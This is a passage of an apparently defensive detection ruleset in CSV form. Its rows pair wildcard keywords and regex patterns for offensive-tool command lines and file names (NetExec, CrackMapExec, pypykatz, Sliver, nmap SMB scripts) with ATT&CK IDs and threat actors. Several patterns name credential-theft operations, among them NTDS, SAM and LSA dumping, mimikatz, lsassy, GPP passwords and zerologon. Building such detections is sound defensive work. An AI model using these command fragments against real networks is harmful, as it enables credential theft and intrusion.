"* sliver_pb2_grpc.py*",".{0,1000}\ssliver_pb2_grpc\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","3166"
"* sliver-client.exe*",".{0,1000}\ssliver\-client\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","3167"
"* sliver-client_windows.exe*",".{0,1000}\ssliver\-client_windows\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","3168"
"* sliver-client_windows-386*.exe*",".{0,1000}\ssliver\-client_windows\-386.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","3169"
"* sliver-client_windows-amd64*.exe*",".{0,1000}\ssliver\-client_windows\-amd64.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","3170"
"* sliver-client_windows-arm64*.exe*",".{0,1000}\ssliver\-client_windows\-arm64.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","3171"
"* SmallSecretsDump.py*",".{0,1000}\sSmallSecretsDump\.py.{0,1000}","offensive_tool_keyword","Adcheck","Assess the security of your Active Directory with few or all privileges. This tool offers functionalities similar to PingCastle","T1087 - T1012 - T1482 - T1059 - T1203 - T1212 - T1480 - T1552 - T1112 - T1207 - T1483 - T1113 - T1057 - T1136 - T1119 - T1082 - T1553 - T1140 - T1107 - T1078 - T1562","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/CobblePot59/Adcheck","1","0","N/A","N/A","10","4","315","35","2025-04-18T15:17:46Z","2024-05-10T13:54:45Z","3172"
"* --smartassembly-methodparentobfuscation *",".{0,1000}\s\-\-smartassembly\-methodparentobfuscation\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","3173"
"* --smartassembly-nameobfuscate *",".{0,1000}\s\-\-smartassembly\-nameobfuscate\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","3174"
"* --smartassembly-typemethodobfuscation *",".{0,1000}\s\-\-smartassembly\-typemethodobfuscation\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","3175"
"* smb * --dpapi *password*",".{0,1000}\ssmb\s.{0,1000}\s\-\-dpapi\s.{0,1000}password.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","3176"
"* smb * --gen-relay-list *.txt*",".{0,1000}\ssmb\s.{0,1000}\s\-\-gen\-relay\-list\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","3177"
"* smb * --lsa --log *",".{0,1000}\ssmb\s.{0,1000}\s\-\-lsa\s\-\-log\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","3178"
"* smb * -M lsassy*",".{0,1000}\ssmb\s.{0,1000}\s\-M\slsassy.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3179"
"* smb * -M masky -o CA=*",".{0,1000}\ssmb\s.{0,1000}\s\-M\smasky\s\-o\sCA\=.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3180"
"* smb * -M msol *",".{0,1000}\ssmb\s.{0,1000}\s\-M\smsol\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","3181"
"* smb * -M ntlmv1 *",".{0,1000}\ssmb\s.{0,1000}\s\-M\sntlmv1\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","3182"
"* smb * -M rdp -o ACTION=enable*",".{0,1000}\ssmb\s.{0,1000}\s\-M\srdp\s\-o\sACTION\=enable.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3183"
"* smb * -M runasppl*",".{0,1000}\ssmb\s.{0,1000}\s\-M\srunasppl.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3184"
"* smb * -M security-questions*",".{0,1000}\ssmb\s.{0,1000}\s\-M\ssecurity\-questions.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3185"
"* smb * -M zerologon*",".{0,1000}\ssmb\s.{0,1000}\s\-M\szerologon.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3186"
"* smb * --ntds --log *",".{0,1000}\ssmb\s.{0,1000}\s\-\-ntds\s\-\-log\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","3187"
"* smb * --sam --log *",".{0,1000}\ssmb\s.{0,1000}\s\-\-sam\s\-\-log\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","3188"
"* smb * --sccm wmi*",".{0,1000}\ssmb\s.{0,1000}\s\s\-\-sccm\swmi.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3189"
"* smb * -u * -p * * -M dfscoerce*",".{0,1000}\ssmb\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s.{0,1000}\s\-M\sdfscoerce.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3190"
"* smb * -u * -p * * --rid-brute*",".{0,1000}\ssmb\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s.{0,1000}\s\-\-rid\-brute.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3191"
"* smb * -u * -p * * --shares --filter-shares *",".{0,1000}\ssmb\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s.{0,1000}\s\-\-shares\s\-\-filter\-shares\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3192"
"* smb * -u * -p * * -X whoami --obfs*",".{0,1000}\ssmb\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s.{0,1000}\s\-X\swhoami\s\-\-obfs.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3193"
"* smb * -u * -p * -M enum_av*",".{0,1000}\ssmb\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\senum_av.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3194"
"* smb * -u * -p * -M enum_dns*",".{0,1000}\ssmb\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\senum_dns.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3195"
"* smb * -u * -p * -M gpp_password*",".{0,1000}\ssmb\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\sgpp_password.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3196"
"* smb * -u * -p * -M met_inject *",".{0,1000}\ssmb\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\smet_inject\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3197"
"* smb * -u * -p * --wmi ""select Name from win32_computersystem""*",".{0,1000}\ssmb\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-wmi\s\""select\sName\sfrom\swin32_computersystem\"".{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3198"
"* smb client * shares *use c$*",".{0,1000}\ssmb\sclient\s.{0,1000}\sshares\s.{0,1000}use\sc\$.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","3199"
"* smb -M mimikatz --options*",".{0,1000}\ssmb\s\-M\smimikatz\s\-\-options.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","3200"
"* smb shareenum *smb2+ntlm-password*",".{0,1000}\ssmb\sshareenum\s.{0,1000}smb2\+ntlm\-password.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","3201"
"* -smb --smbkeyword * -victim *",".{0,1000}\s\-smb\s\-\-smbkeyword\s.{0,1000}\s\-victim\s.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","3202"
"* smb* -u '' -p ''*",".{0,1000}\ssmb.{0,1000}\s\-u\s\'\'\s\-p\s\'\'.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","3203"
"* smb_control.bat*",".{0,1000}\ssmb_control\.bat.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","N/A","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","3204"
"* SMB_Staging.c*",".{0,1000}\sSMB_Staging\.c.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","3205"
"* smb2-capabilities.nse*",".{0,1000}\ssmb2\-capabilities\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3206"
"* smb2-security-mode.nse*",".{0,1000}\ssmb2\-security\-mode\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3207"
"* -smb2support --interactive *",".{0,1000}\s\-smb2support\s\-\-interactive\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","3208"
"* smb2-time.nse*",".{0,1000}\ssmb2\-time\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3209"
"* smb2-vuln-uptime.nse*",".{0,1000}\ssmb2\-vuln\-uptime\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3210"
"* smb-brute.nse*",".{0,1000}\ssmb\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3211"
"* smb-cmds.txt*",".{0,1000}\ssmb\-cmds\.txt.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","3212"
"* smb-double-pulsar-backdoor.nse*",".{0,1000}\ssmb\-double\-pulsar\-backdoor\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3213"
"* smb-enum-domains.nse*",".{0,1000}\ssmb\-enum\-domains\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3214"
"* smb-enum-groups.nse*",".{0,1000}\ssmb\-enum\-groups\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3215"
"* smb-enum-processes.nse*",".{0,1000}\ssmb\-enum\-processes\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3216"
